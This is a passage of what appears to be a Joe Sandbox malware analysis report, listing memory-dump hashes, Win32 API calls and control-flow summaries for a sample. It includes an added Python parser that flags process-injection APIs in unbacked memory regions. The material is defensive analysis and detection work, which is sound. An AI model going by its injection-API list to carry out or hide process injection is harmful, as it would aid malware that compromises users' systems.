                                                  • Opcode Fuzzy Hash: 34127002aa4544e30dad05a90b160fbf94bc1d4fbf1346a16371fc11a5a42d6d
                                                  • Instruction Fuzzy Hash: B92125B1904200DFDB15EF58D984B1ABFA5EB85318F20C56ED90A4B3A6C336D447CA61
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786069367.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_148d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 64c268df9d28f1648248a2d2b79d2ed51dd396f980182a5e23eff34252b6b0b5
                                                  • Instruction ID: e553d34108bd87114277adb58bd5aee9d78f73a2d01aeeb6bd36d920dc44a856
                                                  • Opcode Fuzzy Hash: 64c268df9d28f1648248a2d2b79d2ed51dd396f980182a5e23eff34252b6b0b5
                                                  • Instruction Fuzzy Hash: 9C210771904204DFDB05EF98D9C0B2ABBA5FB84324F20C66ED9094B3A6C336D446CA61
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786069367.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_148d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e33dee4b3c1e370b230b64b4fa63a1ea8fbdebbf61a5cb99a13d0c4a4717f26d
                                                  • Instruction ID: fdcb8991e77b508609af0903857d7c3bbb20f26b30d8825a69442bc1349c9cb9
                                                  • Opcode Fuzzy Hash: e33dee4b3c1e370b230b64b4fa63a1ea8fbdebbf61a5cb99a13d0c4a4717f26d
                                                  • Instruction Fuzzy Hash: 41217F755093808FDB02DF64D594716BF71EB46218F28C5DBD8498B2A7C33A980ACB62
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786013442.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_147d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                  • Instruction ID: 6b6a3b5fe1b35c1a5516b6f3c86dd83b2efe8c2e8addfc2d1190430ceddf3000
                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                  • Instruction Fuzzy Hash: 1411DF72804240DFDB12CF44D9C4B96BF71FF94324F24C2AAD9090B266C33AE45ACBA1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786013442.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_147d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                  • Instruction ID: dd997b71363bf34bd0b79dafbb7640e94279230e74976393c7ad3e994b0e9c5e
                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                  • Instruction Fuzzy Hash: 0F11E172804280CFCB12CF54D9C4B56BF71FF84328F24C6AAD8490B266C336D45ACBA1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786069367.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_148d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                  • Instruction ID: 6f99d3725832921e1a378031e1decee740edbbfe610836652896d2ce5b505e53
                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                  • Instruction Fuzzy Hash: EE11BB75904280DFDB02DF58C5C4B1ABFA1FB84324F24C6AAD8494B3A6C33AD44ACB61
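Each entry above pairs a function's resolved API calls with the memory region it was recovered from: the first field of the Source File name corresponds to the process number in the Snapshot File name (0000000A is process 10), the Offset is the region base, and "based on PE: false" marks code that was never mapped from a file on disk. Read by region rather than by function, the VirtualAllocEx and ResumeThread entries both sit in the unbacked region 07950000 of process 10, which is the pattern behind the "Injects a PE file into a foreign processes" signature. The parser below is an added example, not Joe Sandbox code and not part of this report: it groups the APIs by (process, region) and flags unbacked regions that combine several injection primitives. SAMPLE is constructed from entries on this page; the record-boundary logic, the rule for matching API-ID labels back to API names, the "$" separator and the INJECTION_APIS set are assumptions.

```python
"""Group the Win32 APIs each memory region calls, from Joe Sandbox function
entries ("APIs" / "Memory Dump Source" / "Similarity" blocks).
Added example, not Joe Sandbox code. SAMPLE is constructed from entries on
this page; record boundaries, the API-ID rule and INJECTION_APIS are assumptions."""
import re

# Constructed sample: four records copied from the listing above (processes 10 and 15).
SAMPLE = """\
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030CB101,00000800,00000000,00000000), ref: 030CB312
Memory Dump Source
• Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079593FE
Memory Dump Source
• Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
Similarity
• API ID: AllocVirtual
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
Similarity
• API ID: ResumeThread
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAC19F
Memory Dump Source
• Source File: 0000000F.00000002.2900042021.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
"""

API_CALL = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\([^)]*\),\s*ref:\s*[0-9A-Fa-f]+$")
SOURCE = re.compile(
    r"^•\s*Source File:\s*(?P<pid>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.[0-9A-Fa-f]{16}\.[^,]*,"
    r"\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$"
)
API_ID = re.compile(r"^•\s*API ID:\s*(?P<ids>\S.*)?$")

# Assumption inferred from this page's entries: the "API ID" label drops these
# tokens and sorts the remaining CamelCase words (VirtualAllocEx -> AllocVirtual).
_DROPPED = {"Get", "Set", "Ex", "A", "W", "Ole"}

# Assumption: remote-allocation / thread-control APIs whose co-occurrence in one
# unbacked region is the tail of a process-hollowing or injection sequence.
INJECTION_APIS = {"VirtualAllocEx", "WriteProcessMemory", "SetThreadContext",
                  "ResumeThread", "NtUnmapViewOfSection", "CreateProcessW"}


def api_id_key(api_name):
    words = re.findall(r"[A-Z][a-z0-9]*", api_name)
    return "".join(sorted(w for w in words if w not in _DROPPED))


def parse_entries(text):
    """One dict per function record: resolved calls, API-ID labels, source region."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (line == "Memory Dump Source"
                              and (cur is None or cur["source"] is not None)):
            # "APIs" always opens a record; "Memory Dump Source" opens one only
            # when no record is still waiting for its source block.
            if cur is not None:
                entries.append(cur)
            cur = {"calls": [], "api_ids": [], "source": None}
        elif cur is not None:
            if m := API_CALL.match(line):
                cur["calls"].append(m.group("name"))
            elif m := SOURCE.match(line):
                cur["source"] = {"pid": int(m.group("pid"), 16),
                                 "offset": int(m.group("offset"), 16),
                                 "pe_backed": m.group("pe") == "true"}
            elif (m := API_ID.match(line)) and m.group("ids"):
                cur["api_ids"].extend(m.group("ids").split("$"))  # '$' joins IDs (assumed)
    if cur is not None:
        entries.append(cur)
    return [e for e in entries if e["source"] is not None]


def group_by_region(entries):
    """(pid, region base) -> calls, api_ids, pe_backed merged over all records there."""
    regions = {}
    for e in entries:
        s = e["source"]
        r = regions.setdefault((s["pid"], s["offset"]),
                               {"calls": set(), "api_ids": set(), "pe_backed": s["pe_backed"]})
        r["calls"].update(e["calls"])
        r["api_ids"].update(e["api_ids"])
    return regions


def injection_hits(regions):
    """Unbacked regions holding at least two INJECTION_APIS, by call name or API-ID label."""
    by_label = {api_id_key(a): a for a in INJECTION_APIS}
    hits = {}
    for key, r in regions.items():
        if r["pe_backed"]:
            continue
        found = (r["calls"] & INJECTION_APIS) | {by_label[l] for l in r["api_ids"] if l in by_label}
        if len(found) >= 2:
            hits[key] = sorted(found)
    return hits


if __name__ == "__main__":
    regions = group_by_region(parse_entries(SAMPLE))
    for (pid, base), r in sorted(regions.items()):
        kind = "PE-backed" if r["pe_backed"] else "unbacked"
        print(f"pid {pid:>2} region {base:08X} ({kind}): calls={sorted(r['calls'])} ids={sorted(r['api_ids'])}")
    for (pid, base), apis in injection_hits(regions).items():
        print(f"  -> pid {pid} region {base:08X} combines {apis}")
```

Records whose "APIs" header is empty (the two ResumeThread functions above) only carry the API-ID label, so the grouping matches labels back to names with the same normalisation; on the constructed sample this yields one hit, process 10 region 07950000 with VirtualAllocEx and ResumeThread, while the LoadLibraryExW/GetModuleHandleW region and the DuplicateHandle region stay quiet.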

Execution Graph

Execution Coverage: 9.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 70
Total number of Limit Nodes: 9

Graph summary (process 15; the 63xxxxx and faxxxx addresses fall in the 06300000 and 00FA0000 dumps, and every node is in dynamically decrypted code). Paths from the graph's entry nodes to Win32 APIs:
• 6306110 → 6306138 → 6305398 → 63053a3 → 63053b4 → 6306490 OleInitialize
• fac118 DuplicateHandle → fac1ae
• fad688 → fad6b6 → fabd64 → fabd6f → 6307161 → 6307172 → 63075b0 WaitMessage, which loops back to 6307172 (a blocking message-wait loop); the other exit is 630719a → fae6b7
• ebd01c → ebd034 → 63019c1 / 6301a19 / 6301a28 → 6301a79 or 6301a89 → the 6301c59 / 6301c68 / 6301d10 / 6301d20 / 63031bd / 6300f94 wrappers → 630327a CallWindowProcW
The remaining nodes are intermediate basic blocks of these same functions; the raw node/edge dump of the rendered graph is not reproduced here.

Control-flow Graph

Function 6307161 (process 15, region 06300000): basic blocks from 6307161-6307170 to 630765a-630766f. The body calls the same-region helpers 6305410 (twice, from 63072af and 6307591), 630541c, 6305428, 6305434, 6305440, 6305450, 630545c and 6305468, and blocks in WaitMessage at 63075b0-63075dc before looping back into the body (63075ea → 630728a); 630760e-6307624 is the common exit block. The executed / not-executed colouring of the rendered graph is not reproduced in this text.
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2912374781.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_6300000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f94b11e5b1403fc0408742d0b0f41f2dd49d1d5158de8c00bc1be99740d703a
                                                  • Instruction ID: 119c4898ea2e1bfe61786d5ac9052124684b267c84d7ebd4580d47dadb5db26f
                                                  • Opcode Fuzzy Hash: 2f94b11e5b1403fc0408742d0b0f41f2dd49d1d5158de8c00bc1be99740d703a
                                                  • Instruction Fuzzy Hash: 95E13E30E00209DFEB54DFA9C954B9DBBF1BF48314F158564E409AF2A5DB70E949CB80

Control-flow Graph

Function 6300f94 (process 15, region 06300000): the entry block 6300f94-630321c branches to 6303222-6303227 or 63032cc-63032ec; the 630327a-63032b2 block calls CallWindowProcW (ref 063032A1), and all paths rejoin at 63032ef-63032fc. The executed / not-executed colouring of the rendered graph is not reproduced in this text.
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 063032A1
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2912374781.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_6300000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 926fa3a9f03a42a23c9f1b8c8be9efcb25b1c5232bbd2e4862517960cf7272b6
                                                  • Instruction ID: 9a71b71b4b8cfe2c4090d96c3fd59153acd5406d199cfb34cd64cc62abb7e290
                                                  • Opcode Fuzzy Hash: 926fa3a9f03a42a23c9f1b8c8be9efcb25b1c5232bbd2e4862517960cf7272b6
                                                  • Instruction Fuzzy Hash: 7B4147B4A00306DFEB54CF89C448AAABBF9FF88314F24C459D519AB361D735A845CFA0
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAC19F
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2900042021.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_fa0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 202fd6c861e1c047d1d22a1ad1f9fa7aa4eb7dcb4c05a67c512ec9e4f10e39f4
                                                  • Instruction ID: 4bb220a785a74ec80322ad9a98e1e7b21769effba14bb127808e2009859f306a
                                                  • Opcode Fuzzy Hash: 202fd6c861e1c047d1d22a1ad1f9fa7aa4eb7dcb4c05a67c512ec9e4f10e39f4
                                                  • Instruction Fuzzy Hash: 4621E4B5D00258DFDB10CFA9D984ADEBFF5EB48310F14841AE918A3351D374A944CFA0
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAC19F
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2900042021.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_fa0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: e20f0a561314d4f57b08079ec095c016b1ddfe2468c2656068b39e513d63e551
                                                  • Instruction ID: 15a8b0c76c29929a9ab9001f57131164494265f9acacb1ea4e5e85a3e44d1def
                                                  • Opcode Fuzzy Hash: e20f0a561314d4f57b08079ec095c016b1ddfe2468c2656068b39e513d63e551
                                                  • Instruction Fuzzy Hash: 4321E4B5900248DFDB10CFAAD984ADEFBF4EB48320F14801AE914A3311D374A944CFA4
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 063064E5
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2912374781.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_6300000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 2bfd9e31a3ca726fc0d53e10c658dece30b433dca3f68e9d95c9297c76860951
                                                  • Instruction ID: 7f39e792a4723551e8110a47ebf7820d74d5a40b88ee00ecf943e21b4ab7dd22
                                                  • Opcode Fuzzy Hash: 2bfd9e31a3ca726fc0d53e10c658dece30b433dca3f68e9d95c9297c76860951
                                                  • Instruction Fuzzy Hash: 5F1142B18003488FCB20DFAAC449BDEFFF8EB48320F24841AD558A7210C374A548CFA4
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 063064E5
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2912374781.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_6300000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: c6db9e3be2749e501a95356bc1bce4768b659812004efa444138aee6e61ffd7d
                                                  • Instruction ID: 23fbcf5131f448a4f9c8a4f1f53db6c591e9f3a016397fcc6a12a39ad1d379a7
                                                  • Opcode Fuzzy Hash: c6db9e3be2749e501a95356bc1bce4768b659812004efa444138aee6e61ffd7d
                                                  • Instruction Fuzzy Hash: 321130B58003489FDB20DF9AC449BDEBBF8EB49324F208459D518A7250C374A948CFA4
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2899294670.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_ebd000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d0ddea6f4141cf8f14ebd7d4d82199d9aa5b7866ddcaf642442919db2ca04a66
                                                  • Instruction ID: 624c97ea8905650674b5a68d6290c8e1a430d1aa06d561822802413e93c4ee0e
                                                  • Opcode Fuzzy Hash: d0ddea6f4141cf8f14ebd7d4d82199d9aa5b7866ddcaf642442919db2ca04a66
                                                  • Instruction Fuzzy Hash: 6D210475608200DFCB14EF14D9C4B67BFA6FB88318F24C56DD84A5B296D33AD847CA61
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2899294670.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_ebd000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14acfc0da0d8d3aa18ad883a48d7669a389db2a4b5da51fe537475ac27c6d9b4
                                                  • Instruction ID: 4f1cb432e4cf66e8658b757a8bd1b0f1aa87acc53dfe0690c4172bb2b4ff3e85
                                                  • Opcode Fuzzy Hash: 14acfc0da0d8d3aa18ad883a48d7669a389db2a4b5da51fe537475ac27c6d9b4
                                                  • Instruction Fuzzy Hash: 5521837550D3808FCB02DF24D994756BF71EB46314F28C5DAD8498F2A7C33A980ACB62
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2899190213.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_ead000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: abe9a84ab9d056d3ba2c3179173d38fc57855e43f08afe40273e62e9d874adcb
                                                  • Instruction ID: 59857cd6ce2363c73ebb458b680b4c0bfb2145f2952a457cd15ffb5c08fc23b0
                                                  • Opcode Fuzzy Hash: abe9a84ab9d056d3ba2c3179173d38fc57855e43f08afe40273e62e9d874adcb
                                                  • Instruction Fuzzy Hash: 3FF09671408344AEE7108E16DCC4BA6FFA8EF95738F18C45AED0D5F686C279AC44CAB1